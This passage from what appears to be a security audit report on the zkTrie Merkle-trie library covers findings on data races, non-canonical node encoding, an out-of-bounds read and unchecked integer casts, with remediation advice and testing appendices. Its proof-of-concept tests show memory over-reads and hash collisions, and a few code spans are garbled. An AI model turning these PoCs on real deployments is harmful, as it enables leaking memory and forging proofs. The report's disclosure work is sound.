6.1: zktrie/trie/zk_trie_database.go#19
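As a sketch of that suggestion (the panic message is ours; the receiver is the Database type from figure 6.1):

// UpdatePreimage is deliberately unimplemented for this Database type;
// panicking makes any accidental use fail loudly instead of silently doing nothing.
func (db *Database) UpdatePreimage([]byte, *big.Int) {
	panic("zktrie: Database.UpdatePreimage is not implemented")
}

If crashing is undesirable, logging a warning through the standard log package would provide the same visibility.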
Recommendations Short term, add an unimplemented message to the function body, through either a panic or message logging. +7. CanonicalValue is not canonical Severity: Informational Difficulty: N/A Type: Cryptography Finding ID: TOB-ZKTRIE-7 Target: trie/zk_trie_node.go Description The CanonicalValue function does not generate a unique representation of Node structures: different Nodes can have the same CanonicalValue, and two nodes with the same NodeHash can have different CanonicalValues. ValuePreimages in a Node can be either uncompressed or compressed (by hashing); the CompressedFlags value indicates which data is compressed. Only the first 24 fields can be compressed, so CanonicalValue truncates CompressedFlags to the first 24 bits. But NewLeafNode accepts any uint32 for the CompressedFlags field of a Node. Figure 7.3 shows how this can be used to construct two different Node structs that have the same CanonicalValue. // CanonicalValue returns the byte form of a node required to be persisted, and strip unnecessary fields // from the encoding (current only KeyPreimage for Leaf node) to keep a minimum size for content being // stored in backend storage func (n *Node) CanonicalValue() []byte { switch n.Type { case NodeTypeParent: // {Type || ChildL || ChildR} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.ChildL.Bytes()...) bytes = append(bytes, n.ChildR.Bytes()...) return bytes case NodeTypeLeaf: // {Type || Data...} bytes := []byte{byte(n.Type)} bytes = append(bytes, n.NodeKey.Bytes()...) tmp := make([]byte, 4) compressedFlag := (n.CompressedFlags << 8) + uint32(len(n.ValuePreimage)) binary.LittleEndian.PutUint32(tmp, compressedFlag) bytes = append(bytes, tmp...) for _, elm := range n.ValuePreimage { bytes = append(bytes, elm[:]...) } bytes = append(bytes, 0) return bytes case NodeTypeEmpty: // { Type } return []byte{byte(n.Type)} default: return []byte{} } } Figure 7.1: This figure shows the CanonicalValue computation. The highlighted code assumes that CompressedFlags is 24 bits. (zktrie/trie/zk_trie_node.go#187–214) // NewLeafNode creates a new leaf node. func NewLeafNode(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) *Node { return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage} } Figure 7.2: Node construction in NewLeafNode (zktrie/trie/zk_trie_node.go#55–58) // CanonicalValue implicitly truncates CompressedFlags to 24 bits. This test should ideally fail. func TestZkTrie_CanonicalValue1(t *testing.T) { key, err := hex.DecodeString("0000000000000000000000000000000000000000000000000000000000000000") assert.NoError(t, err) vPreimage := []zkt.Byte32{{0}} k := zkt.NewHashFromBytes(key) vFlag0 := uint32(0x00ffffff) vFlag1 := uint32(0xffffffff) lf0 := NewLeafNode(k, vFlag0, vPreimage) lf1 := NewLeafNode(k, vFlag1, vPreimage) // These two assertions should never simultaneously pass. assert.True(t, lf0.CompressedFlags != lf1.CompressedFlags) assert.True(t, reflect.DeepEqual(lf0.CanonicalValue(), lf1.CanonicalValue())) } Figure 7.3: A test showing that one can construct different nodes with the same CanonicalValue
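One way to close this gap is to validate CompressedFlags at construction time. The following sketch uses a new constructor name and error handling of our own choosing; it is not the library's API:

// NewLeafNodeChecked is a hypothetical constructor that rejects
// CompressedFlags values that CanonicalValue would silently truncate.
func NewLeafNodeChecked(k *zkt.Hash, valueFlags uint32, valuePreimage []zkt.Byte32) (*Node, error) {
	if valueFlags > 0xffffff {
		return nil, fmt.Errorf("CompressedFlags 0x%x does not fit in 24 bits", valueFlags)
	}
	return &Node{Type: NodeTypeLeaf, NodeKey: k, CompressedFlags: valueFlags, ValuePreimage: valuePreimage}, nil
}

With such a check, the two leaves in figure 7.3 could not both be constructed, so their CanonicalValues could not collide.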
// PreHandlingElems turn persisted byte32 elements into field arrays for our hashElem // it also has the compressed byte32 func PreHandlingElems(flagArray uint32, elems []Byte32) (*Hash, error) { ret := make([]*big.Int, len(elems)) var err error for i, elem := range elems { if flagArray&(1<> 8 n.ValuePreimage = make([]zkt.Byte32, preimageLen) curPos := zkt.HashByteLen + 4 if len(b) < curPos+preimageLen*32+1 { return nil, ErrNodeBytesBadSize } … if preImageSize != 0 { if len(b) < curPos+preImageSize { return nil, ErrNodeBytesBadSize } n.KeyPreimage = new(zkt.Byte32) copy(n.KeyPreimage[:], b[curPos:curPos+preImageSize]) } case NodeTypeEmpty: break Figure 14.1: preimageLen and len(b) are not fully checked. (trie/zk_trie_node.go#78–111) Recommendations Short term, add checks of the total byte array length and the preimageLen field to NewNodeFromBytes. Long term, explicitly document the serialization format for nodes, and add tests for incorrect serialized nodes. +15. init_hash_scheme is not thread-safe Severity: Informational Difficulty: N/A Type: Undefined Behavior Finding ID: TOB-ZKTRIE-15 Target: src/lib.rs, lib.go, c.go, types/hash.go Description zktrie provides a safe-Rust interface around its Go implementation. Safe Rust statically prevents various memory safety errors, including null pointer dereferences and data races. However, when unsafe Rust is wrapped in a safe interface, the unsafe code must provide any guarantees that safe Rust expects. For more information about writing unsafe Rust, consult The Rustonomicon. The init_hash_scheme function, shown in figure 15.1, calls InitHashScheme, which is a cgo wrapper for the Go function shown in figure 15.2. pub fn init_hash_scheme(f: HashScheme) { unsafe { InitHashScheme(f) } } Figure 15.1: src/lib.rs#67–69 // notice the function must use C calling convention //export InitHashScheme func InitHashScheme(f unsafe.Pointer) { hash_f := C.hashF(f) C.init_hash_scheme(hash_f) zkt.InitHashScheme(hash_external) } Figure 15.2: lib.go#65–71 InitHashScheme calls two other functions: first, a C function called init_hash_scheme, and second, another Go function, also called InitHashScheme (this time in types/hash.go). This second Go function is synchronized with a sync.Once object, as shown in figure 15.3. func InitHashScheme(f func([]*big.Int) (*big.Int, error)) { setHashScheme.Do(func() { hashScheme = f }) } Figure 15.3: types/hash.go#29– However, the C function init_hash_scheme, shown in figure 15.4, performs a completely unsynchronized write to the global variable hash_scheme, which can lead to a data race. void init_hash_scheme(hashF f){ hash_scheme = f; } Figure 15.4: c.go#13–15 Note that the only potential data race comes from multi-threaded initialization, which would contradict the usage recommendation in the README, shown in figure 15.5. We must init the crate with a poseidon hash scheme before any actions: … zktrie_util::init_hash_scheme(hash_scheme); Figure 15.5: README.md#8–24 Recommendations Short term, add synchronization to C.init_hash_scheme, perhaps by using the same sync.Once object as hash.go. Long term, carefully review all interactions between C and Rust, paying special attention to anything mentioned in the “How Safe and Unsafe Interact” section of the Rustonomicon.
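The short-term fix can live entirely in the cgo wrapper: gating the exported function on a sync.Once guarantees that the unsynchronized C write executes at most once. A sketch, assuming the surrounding declarations from lib.go (the initOnce variable name is ours):

var initOnce sync.Once // mirrors the setHashScheme sync.Once in types/hash.go

//export InitHashScheme
func InitHashScheme(f unsafe.Pointer) {
	initOnce.Do(func() {
		hash_f := C.hashF(f)
		C.init_hash_scheme(hash_f) // the racy write to the C global now happens at most once
		zkt.InitHashScheme(hash_external)
	})
}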
+16. Safe-Rust ZkMemoryDb interface is not thread-safe Severity: High Difficulty: High Type: Undefined Behavior Finding ID: TOB-ZKTRIE-16 Target: lib.go, src/lib.rs, trie/zk_trie_database.go Description The Go function Database.Init, shown in figure 16.1, is not thread-safe. In particular, if it is called from multiple threads, a data race may occur when writing to the map. In normal usage, that is not a problem; any user of the Database.Init function is expected to run the function only during initialization, when synchronization is not required. // Init flush db with batches of k/v without locking func (db *Database) Init(k, v []byte) { db.db[string(k)] = v } Figure 16.1: trie/zk_trie_database.go#40–43 However, this function is called by the safe Rust function ZkMemoryDb::add_node_bytes (figure 16.2) via the cgo function InitDbByNode (figure 16.3): pub fn add_node_bytes(&mut self, data: &[u8]) -> Result<(), ErrString> { let ret_ptr = unsafe { InitDbByNode(self.db, data.as_ptr(), data.len() as c_int) }; if ret_ptr.is_null() { Ok(()) } else { Err(ret_ptr.into()) } } Figure 16.2: src/lib.rs#171–178 // flush db with encoded trie-node bytes //export InitDbByNode func InitDbByNode(pDb C.uintptr_t, data *C.uchar, sz C.int) *C.char { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) bt := C.GoBytes(unsafe.Pointer(data), sz) n, err := trie.DecodeSMTProof(bt) if err != nil { return C.CString(err.Error()) } else if n == nil { //skip magic string return nil } hash, err := n.NodeHash() if err != nil { return C.CString(err.Error()) } db.Init(hash[:], n.CanonicalValue()) return nil } Figure 16.3: lib.go#147–170 Safe Rust is required to never invoke undefined behavior, such as data races. When wrapping unsafe Rust code, including FFI calls, care must be taken to ensure that safe Rust code cannot invoke undefined behavior through that wrapper. (Refer to the “How Safe and Unsafe Interact” section of the Rustonomicon.) Although add_node_bytes takes &mut self, and thus cannot be called from more than one thread at once, a second reference to the database can be created in a way that Rust’s borrow checker cannot track, by calling new_trie. Figures 16.4, 16.5, and 16.6 show the call trace by which a pointer to the Database is stored in the ZkTrieImpl. pub fn new_trie(&mut self, root: &Hash) -> Option<ZkTrie> { let ret = unsafe { NewZkTrie(root.as_ptr(), self.db) }; if ret.is_null() { None } else { Some(ZkTrie { trie: ret }) } } Figure 16.4: src/lib.rs#181–189 func NewZkTrie(root_c *C.uchar, pDb C.uintptr_t) C.uintptr_t { h := cgo.Handle(pDb) db := h.Value().(*trie.Database) root := C.GoBytes(unsafe.Pointer(root_c), 32) zktrie, err := trie.NewZkTrie(*zkt.NewByte32FromBytes(root), db) if err != nil { return 0 } return C.uintptr_t(cgo.NewHandle(zktrie)) } Figure 16.5: lib.go#174–185 func NewZkTrieImpl(storage ZktrieDatabase, maxLevels int) (*ZkTrieImpl, error) { return NewZkTrieImplWithRoot(storage, &zkt.HashZero, maxLevels) } // NewZkTrieImplWithRoot loads a new ZkTrieImpl. If in the storage already exists one // will open that one, if not, will create a new one.
func NewZkTrieImplWithRoot(storage ZktrieDatabase, root *zkt.Hash, maxLevels int) (*ZkTrieImpl, error) { mt := ZkTrieImpl{db: storage, maxLevels: maxLevels, writable: true} mt.rootHash = root if *root != zkt.HashZero { _, err := mt.GetNode(mt.rootHash) if err != nil { return nil, err } } return &mt, nil } Figure 16.6: trie/zk_trie_impl.go#56–72 Then, by calling add_node_bytes in one thread and ZkTrie::root() or some other method that calls Database.Get(), one can trigger a data race from safe Rust. Exploit Scenario A Rust-based library consumer uses threads to improve performance. Relying on Rust’s type system, they assume that thread safety has been enforced and they run ZkMemoryDb::add_node_bytes in a multi-threaded scenario. A data race occurs and the system crashes. Recommendations Short term, add synchronization to Database.Init, such as by calling db.lock.Lock(). Long term, carefully review all interactions between C and Rust, paying special attention to guidance in the “How Safe and Unsafe Interact” section of the Rustonomicon.
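The short-term recommendation amounts to a small change to figure 16.1; a sketch, assuming the db.lock mutex referenced in the recommendation exists on the Database struct:

// Init flushes the db with batches of k/v; taking the lock makes it safe
// to call concurrently with other Database methods.
func (db *Database) Init(k, v []byte) {
	db.lock.Lock()
	defer db.lock.Unlock()
	db.db[string(k)] = v
}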
+17. Some Node functions return the zero hash instead of errors Severity: Informational Difficulty: N/A Type: Error Reporting Finding ID: TOB-ZKTRIE-17 Target: lib.go, trie/zk_trie_node.go Description The Node.NodeHash and Node.ValueHash methods each return the zero hash in cases in which an error return would be more appropriate. In the case of NodeHash, all invalid node types return the zero hash, the same hash as an empty node (shown in figure 17.1). case NodeTypeEmpty: // Zero n.nodeHash = &zkt.HashZero default: n.nodeHash = &zkt.HashZero } } return n.nodeHash, nil Figure 17.1: trie/zk_trie_node.go#149–155 In the case of ValueHash, non-leaf nodes have a zero value hash, as shown in figure 17.2. func (n *Node) ValueHash() (*zkt.Hash, error) { if n.Type != NodeTypeLeaf { return &zkt.HashZero, nil } Figure 17.2: trie/zk_trie_node.go#160–163 In both of these cases, returning an error is more appropriate and prevents potential confusion if client software assumes that the main return value is valid whenever the error returned is nil. Recommendations Short term, have the functions return an error in these cases instead of the zero hash. Long term, ensure that exceptional cases lead to non-nil error returns rather than default values. +18. get_account can read past the buffer Severity: High Difficulty: Medium Type: Data Exposure Finding ID: TOB-ZKTRIE-18 Target: lib.rs Description The public get_account function assumes that the provided key corresponds to an account key. However, if the function is instead called with a storage key, it will cause an out-of-bounds read that could leak secret information. In the Rust implementation, leaf nodes can have two types of values: accounts and storage. Account values have a size of either 128 or 160 bytes, depending on whether they include one or two code hashes. On the other hand, storage values always have a size of 32 bytes. The get_account function takes a key and returns the account associated with it. In practice, it computes the value pointer associated with the key and reads 128 or 160 bytes at that address. If the key contains a storage value rather than an account value, then get_account reads 96 or 128 bytes past the buffer. This is shown in figure 18.4. // get account data from account trie pub fn get_account(&self, key: &[u8]) -> Option<AccountData> { self.get::<ACCOUNTSIZE>(key).map(|arr| unsafe { std::mem::transmute::<[u8; FIELDSIZE * ACCOUNTFIELDS], AccountData>(arr) }) } Figure 18.1: get_account calls get with type ACCOUNTSIZE and key. (zktrie/src/lib.rs#230–235) // all errors are reduced to "not found" fn get<const T: usize>(&self, key: &[u8]) -> Option<[u8; T]> { let ret = unsafe { TrieGet(self.trie, key.as_ptr(), key.len() as c_int) }; if ret.is_null() { None } else { Some(must_get_const_bytes::<T>(ret)) } } Figure 18.2: get calls must_get_const_bytes with type ACCOUNTSIZE and the pointer returned by TrieGet. (zktrie/src/lib.rs#214–223) fn must_get_const_bytes<const T: usize>(p: *const u8) -> [u8; T] { let bytes = unsafe { std::slice::from_raw_parts(p, T) }; let bytes = bytes .try_into() .expect("the buf has been set to specified bytes"); unsafe { FreeBuffer(p.cast()) } bytes } Figure 18.3: must_get_const_bytes calls std::slice::from_raw_parts with type ACCOUNTSIZE and pointer p to read ACCOUNTSIZE bytes from pointer p. (zktrie/src/lib.rs#100–107) #[test] fn get_account_overflow() { let storage_key = hex::decode("0000000000000000000000000000000000000000000000000000000000000000") .unwrap(); let storage_data = [10u8; 32]; init_hash_scheme(hash_scheme); let mut db = ZkMemoryDb::new(); let root_hash = Hash::from([0u8; 32]); let mut trie = db.new_trie(&root_hash).unwrap(); trie.update_store(&storage_key, &storage_data).unwrap(); println!("{:?}", trie.get_account(&storage_key).unwrap()); } // Sample output (picked from a sample of ten runs): // [[10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10], [160, 113, 63, 0, 2, 0, 0, 0, 161, 67, 240, 40, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 24, 158, 63, 0, 2, 0, 0, 0, 17, 72, 240, 40, 1, 0, 0, 0], [16, 180, 85, 254, 1, 0, 0, 0, 216, 179, 85, 254, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]] Figure 18.4: This is a proof-of-concept demonstrating the buffer over-read. When run with cargo test get_account_overflow -- --nocapture, it prints 128 bytes with the last 96 bytes being over-read. Exploit Scenario Suppose the Rust program leaves secret data in memory. An attacker can interact with the zkTrie to read secret data out-of-bounds. Recommendations Short term, have get_account return an error when it is called on a key containing a storage value. Additionally, this logic should be moved to the Go implementation instead of residing in the Rust bindings. Long term, review all unsafe code, especially code related to pointer manipulation, to prevent similar issues. +19. Unchecked usize to c_int casts allow hash collisions by length misinterpretation Severity: High Difficulty: Medium Type: Data Validation Finding ID: TOB-ZKTRIE-19 Target: lib.rs Description A set of unchecked integer casting operations can lead to hash collisions and runtime errors reachable from the public Rust interface. The Rust library regularly needs to convert an input byte array’s length from the usize type to the c_int type. Depending on the architecture, these types might differ in size and signedness. This difference allows an attacker to provide an array with a maliciously chosen length that will be cast to a different number.
The attacker can choose to manipulate the array and cast the value to a smaller value than the actual array length, allowing the attacker to create two leaf nodes from different byte arrays that result in the same hash. The attacker is also able to cast the value to a negative number, causing a runtime error when the Go library calls the GoBytes function. The issue is caused by the explicit and unchecked cast using the as operator and occurs in the ZkTrieNode::parse, ZkMemoryDb::add_node_bytes, ZkTrie::get, ZkTrie::prove, ZkTrie::update, and ZkTrie::delete functions (all of which are public). Figure 19.1 shows ZkTrieNode::parse: impl ZkTrieNode { pub fn parse(data: &[u8]) -> Self { Self { trie_node: unsafe { NewTrieNode(data.as_ptr(), data.len() as c_int) }, } } Figure 19.1: zktrie/src/lib.rs#133–138 To achieve a collision for nodes constructed from different byte arrays, first observe that (c_int::MAX as usize) * 2 + 2 is 0 when cast to c_int. Thus, creating two nodes that have the same prefix and are then padded to that length with different bytes will cause the Go library to interpret only the common prefix of these nodes. The following test showcases this exploit. #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); // common prefix let nd = &hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap(); // create node1 with prefix padded by zeroes let mut vec_nd = nd.to_vec(); let mut zero_padd_data = vec![0u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut zero_padd_data); let node1 = ZkTrieNode::parse(&vec_nd); // create node2 with prefix padded by ones let mut vec_nd = nd.to_vec(); let mut one_padd_data = vec![1u8; (c_int::MAX as usize) * 2 + 2]; vec_nd.append(&mut one_padd_data); let node2 = ZkTrieNode::parse(&vec_nd); // create node3 with just the prefix let node3 = ZkTrieNode::parse(&hex::decode("012098f5fb9e239eab3ceac3f27b81e481dc3124d55ffed523a839ee8446b64864010100000000000000000000000000000000000000000000000000000000018282256f8b00").unwrap()); // all hashes are equal assert_eq!(node1.node_hash(), node2.node_hash()); assert_eq!(node1.node_hash(), node3.node_hash()); } Figure 19.2: A test showing three different leaf nodes with colliding hashes This finding also allows an attacker to cause a runtime error by choosing the data array with the appropriate length that will cause the cast to result in a negative number. Figure 19.3 shows a test that triggers the runtime error for the parse function: #[test] fn invalid_cast() { init_hash_scheme(hash_scheme); let data = vec![0u8; c_int::MAX as usize + 1]; println!("{:?}", data.len() as c_int); let _nd = ZkTrieNode::parse(&data); } // running 1 test // -2147483648 // panic: runtime error: gobytes: length out of range // goroutine 17 [running, locked to thread]: _cgo_gotypes.go:102 // main._Cfunc_GoBytes(...) // // main.NewTrieNode.func1(0x14000062de8?, 0x80000000) // /zktrie/lib.go:78 +0x50 // main.NewTrieNode(0x14000062e01?, 0x2680?) /zktrie/lib.go:78 +0x1c // Figure 19.3: A test that triggers the issue, whose output shows the reinterpreted length of the array Exploit Scenario An attacker provides two different byte arrays that will have the same node_hash, breaking the assumption that such nodes are hard to obtain. Recommendations Short term, have the code perform the cast in a checked manner by using the c_int::try_from method to allow validation if the conversion succeeds. Determine whether the Rust functions should allow arbitrary-length inputs; document the length requirements and assumptions. Long term, regularly run Clippy in pedantic mode to find and fix all potentially dangerous casts.
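As defense in depth on the other side of the FFI boundary, the Go entry points could also reject lengths that a wrapped-around cast can produce, since C.GoBytes panics on negative lengths. A sketch in Go (the checkedLen helper is ours, not part of lib.go):

// checkedLen validates a length received from across the FFI boundary;
// a negative value here means the caller's usize-to-c_int cast overflowed.
func checkedLen(sz C.int) (int, error) {
	if sz < 0 {
		return 0, fmt.Errorf("invalid buffer length %d", int(sz))
	}
	return int(sz), nil
}

Each //export function would call checkedLen before passing the size to C.GoBytes, returning an error string (as InitDbByNode already does) or a zero handle instead of crashing.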
A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Access Controls: Insufficient authorization or assessment of rights
Auditing and Logging: Insufficient auditing of actions or logging of problems
Authentication: Improper identification of users
Configuration: Misconfigured servers, devices, or software components
Cryptography: A breach of system confidentiality or integrity
Data Exposure: Exposure of sensitive information
Data Validation: Improper reliance on the structure or values of data
Denial of Service: A system failure with an availability impact
Error Reporting: Insecure or insufficient reporting of error conditions
Patching: Use of an outdated software package or library
Session Management: Improper identification of authenticated users
Testing: Insufficient test methodology or test coverage
Timing: Race conditions or other order-of-operations flaws
Undefined Behavior: Undefined behavior triggered within the system
Severity Levels
Informational: The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined: The extent of the risk was not determined during this engagement.
Low: The risk is small or is not one the client has indicated is important.
Medium: User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High: The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Undetermined: The difficulty of exploitation was not determined during this engagement.
Low: The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium: An attacker must write an exploit or will need in-depth knowledge of the system.
High: An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Arithmetic: The proper use of mathematical operations and semantics
Complexity Management: The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management: The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Data Handling: The safe handling of user inputs and data processed by the system
Documentation: The presence of comprehensive and readable codebase documentation
Maintenance: The timely maintenance of system components to mitigate risk
Memory Safety and Error Handling: The presence of memory safety and robust error-handling mechanisms
Testing and Verification: The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Strong: No issues were found, and the system exceeds industry standards.
Satisfactory: Minor issues were found, but the system is compliant with best practices.
Moderate: Some issues that may affect system safety were found.
Weak: Many issues that affect system safety were found.
Missing: A required component is missing, significantly affecting system safety.
Not Applicable: The category is not applicable to this review.
Not Considered: The category was not considered in this review.
Further Investigation Required: Further investigation is required to reach a meaningful conclusion.
C. Code Quality Findings We identified the following code quality issues through manual and automatic code review. ● Unnecessary parentheses on function call // NewSecure creates a trie // SecureBinaryTrie bypasses all the buffer mechanism in *Database, it directly uses the // underlying diskdb func NewZkTrie(root zkt.Byte32, db ZktrieDatabase) (*ZkTrie, error) { maxLevels := NodeKeyValidBytes * 8 tree, err := NewZkTrieImplWithRoot((db), zkt.NewHashFromBytes(root.Bytes()), maxLevels) Figure C.1: zktrie/trie/zk_trie.go#49–54 ● Typo in code comment // reduce 2 fieds into one Figure C.2: types/util.go#L8-L8 ● Copy-pasted code comment // ErrNodeKeyAlreadyExists is used when a node key already exists. ErrInvalidField = errors.New("Key not inside the Finite Field") Figure C.3: zktrie/trie/zk_trie_impl.go#20–21 ● Empty if branch if e != nil { //fmt.Println("err on NodeTypeEmpty mt.addNode ", e) } return r, e Figure C.4: zktrie/trie/zk_trie_impl.go#190–193 ● Superfluous nil error check if err != nil { return err } return nil Figure C.5: zktrie/trie/zk_trie_impl.go#120– ● Potential panic in function returning Result. Instead, the function should return a Result with the appropriate message. pub fn update_account( &mut self, key: &[u8], acc_fields: &AccountData, ) -> Result<(), ErrString> { let acc_buf: &[u8; FIELDSIZE * ACCOUNTFIELDS] = unsafe { let ptr = acc_fields.as_ptr(); ptr.cast::<[u8; FIELDSIZE * ACCOUNTFIELDS]>() .as_ref() .expect("casted ptr can not be null") Figure C.6: zktrie/src/lib.rs#279–288 ● Typo in code comment // ValuePreimage can store at most 256 byte32 as fields (represnted by BIG-ENDIAN integer) Figure C.7: “represnted” should be “represented” (zktrie/trie/zk_trie_node.go#41) ● Redundant error handling. The following code should simply check whether err != nil and then return nil, err. if err == ErrKeyNotFound { return nil, ErrKeyNotFound } else if err != nil { return nil, err } Figure C.8: zktrie/trie/zk_trie_impl.go#508–512 ● Typo in variable name. The variables should read FIELD instead of FILED. static FILED_ERROR_READ: &str = "invalid input field"; static FILED_ERROR_OUT: &str = "output field fail"; Figure C.9: zktrie/src/lib.rs#309–310 ● The difference between NewHashFromBytes and NewHashFromCheckedBytes is not explicitly documented. NewHashFromBytes truncates its input, while NewHashFromCheckedBytes returns an error if the input is the wrong length. // NewHashFromBytes returns a *Hash from a byte array considered to be // a represent of big-endian integer, it swapping the endianness // in the process. func NewHashFromBytes(b []byte) *Hash { var h Hash copy(h[:], ReverseByteOrder(b)) return &h } // NewHashFromCheckedBytes is the intended method to get a *Hash from a byte array // that previously has ben generated by the Hash.Bytes() method. so it check the // size of bytes to be expected length func NewHashFromCheckedBytes(b []byte) (*Hash, error) { if len(b) != HashByteLen { return nil, fmt.Errorf("expected %d bytes, but got %d bytes", HashByteLen, len(b)) } return NewHashFromBytes(b), nil } Figure C.10: types/hash.go#111–128 ● Unclear comment.
The “create-delete issue” should be documented. //mitigate the create-delete issue: do not delete unexisted key Figure C.11: trie/zk_trie.go#118 ● TrieDelete swallows errors. This error should be propagated to the Rust bindings like other error returns. // delete leaf, silently omit any error //export TrieDelete func TrieDelete(p C.uintptr_t, key_c *C.uchar, key_sz C.int) { h := cgo.Handle(p) tr := h.Value().(*trie.ZkTrie) key := C.GoBytes(unsafe.Pointer(key_c), key_sz) tr.TryDelete(key) } Figure C.12: lib.go#243– D. Automated Analysis Tool Configuration As part of this assessment, we used the tools described below to perform automated testing of the codebase. D.1. golangci-lint We used the static analyzer aggregator golangci-lint to quickly analyze the codebase. D.2. Semgrep We used the static analyzer Semgrep to search for weaknesses in the source code repository. Note that these rule sets will output repeated results, which should be ignored. git clone git@github.com:dgryski/semgrep-go.git git clone https://github.com/0xdea/semgrep-rules semgrep --metrics=off --sarif --config p/r2c-security-audit semgrep --metrics=off --sarif --config p/trailofbits semgrep --metrics=off --sarif --config https://semgrep.dev/p/gosec semgrep --metrics=off --sarif --config https://raw.githubusercontent.com/snowflakedb/gosnowflake/master/.semgrep.yml semgrep --metrics=off --sarif --config semgrep-go semgrep --metrics=off --sarif --config semgrep-rules Figure D.1: The commands used to run Semgrep D.3. CodeQL We analyzed the Go codebase with Trail of Bits’s private CodeQL queries. We recommend that Scroll review CodeQL’s licensing policies if it intends to run CodeQL. # Create the go database codeql database create codeql.db --language=go # Run all go queries codeql database analyze codeql.db --additional-packs ~/.codeql/codeql-repo --format=sarif-latest --output=codeql_tob_all.sarif -- tob-go-all Figure D.2: Commands used to run CodeQL D.4. go cover We ran the go cover tool with the following command on both the trie and types folders to obtain a test coverage report: go test -cover -coverprofile c.out && go tool cover -html=c.out Note that this needs to be run separately for each folder. D.5. cargo audit This tool audits Cargo.lock against the RustSec advisory database. This tool did not reveal any findings but should be run every time new dependencies are included in the codebase. D.6. cargo-llvm-cov cargo-llvm-cov generates Rust code coverage reports. We used the cargo llvm-cov --open command to generate a coverage report for the Rust tests. D.7. Clippy The Rust linter Clippy can be installed using rustup by running the command rustup component add clippy. Invoking cargo clippy --workspace -- -W clippy::pedantic in the root directory of the project runs the tool. Clippy warns about the casting operations from usize to c_int that resulted in finding TOB-ZKTRIE-19. E. Go Fuzzing Harness During the assessment, we wrote a fuzzing harness for the Merkle tree proof verifier function. Because native Go fuzzing does not support all necessary types, some proof structure types had to be manually constructed. Some parts of the proof were built naively, and the fuzzing harness can be iteratively improved by Scroll’s team. Running the go test -fuzz=FuzzVerifyProofZkTrie command will start the fuzzing campaign. // Truncate or pad array to length sz func padtolen(arr []byte, sz int) []byte { if len(arr) < sz { arr = append(arr, bytes.Repeat([]byte{0}, sz-len(arr))...)
} else { arr = arr[:sz] } return arr } func FuzzVerifyProofZkTrie(f *testing.F) { zkTrie, _ := newZkTrieImpl(NewZkTrieMemoryDb(), 10) k := zkt.NewHashFromBytes(bytes.Repeat([]byte("a"), 32)) vp := []zkt.Byte32{*zkt.NewByte32FromBytes(bytes.Repeat([]byte("b"), 32))} node := NewLeafNode(k, 1, vp) f.Fuzz(func(t *testing.T, existence bool, depth uint, notempties []byte, siblings []byte, nodeAuxA []byte, nodeAuxB []byte) { notempties = padtolen(notempties, 30) typedsiblings := make([]*zkt.Hash, 10) for i := range typedsiblings { typedsiblings[i] = zkt.NewHashFromBytes(padtolen(siblings, 32)) } typedata := [30]byte{} copy(typedata[:], notempties) var nodeAux *NodeAux if !existence { nodeAux = &NodeAux{ Key: zkt.NewHashFromBytes(padtolen(nodeAuxA, 32)), Value: zkt.NewHashFromBytes(padtolen(nodeAuxB, 32)), } } proof := &Proof{ Existence: existence, depth: depth, notempties: typedata, Siblings: typedsiblings, NodeAux: nodeAux, } if VerifyProofZkTrie(zkTrie.rootHash, proof, node) { panic("valid proof") } }) } Figure E.1: The fuzzing harness for VerifyProofZkTrie F. Go Randomized Test During the assessment, we wrote a simple randomized test to verify that the behavior of the zkTrie matches an ideal tree (i.e., an associative array). The test currently fails due to the verifier misbehavior described in this report. The test can be run with go test -v -run TestZkTrie_BasicRandomTest. // Basic randomized test to verify the trie's set, get, and remove features. func TestZkTrie_BasicRandomTest(t *testing.T) { root := zkt.Byte32{} db := NewZkTrieMemoryDb() zkTrie, err := NewZkTrie(root, db) assert.NoError(t, err) idealTrie := make(IdealTrie) const NUM_BYTES = 32 const NUM_KEYS = 1024 keys := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) data := random_hex_str_array(t, NUM_BYTES, NUM_KEYS) // PHASE 1: toss a coin and set elements (Works) for i := 0; i < len(keys); i++ { if toss(t) == true { set(t, zkTrie, idealTrie, keys[i], data[i]) } } // PHASE 2: toss a coin and get elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { get(t, zkTrie, idealTrie, keys[i]) } } // PHASE 3: toss a coin and remove elements (Fails) for i := 0; i < len(keys); i++ { if toss(t) == true { remove(t, zkTrie, idealTrie, keys[i]) } } } Figure F.1: A basic randomized test for ZkTrie (trie/zk_trie_test.go) type IdealTrie = map[string][]byte func random_hex_str(t *testing.T, str_bytes int) string { outBytes := make([]byte, str_bytes) n, err := rand.Read(outBytes) assert.NoError(t, err) assert.Equal(t, n, str_bytes) return hex.EncodeToString(outBytes) } func random_hex_str_array(t *testing.T, str_bytes int, array_size int) []string { out := []string{} for i := 0; i < array_size; i++ { hex_str := random_hex_str(t, str_bytes) out = append(out, hex_str) } return out } // Randomly returns true or false func toss(t *testing.T) bool 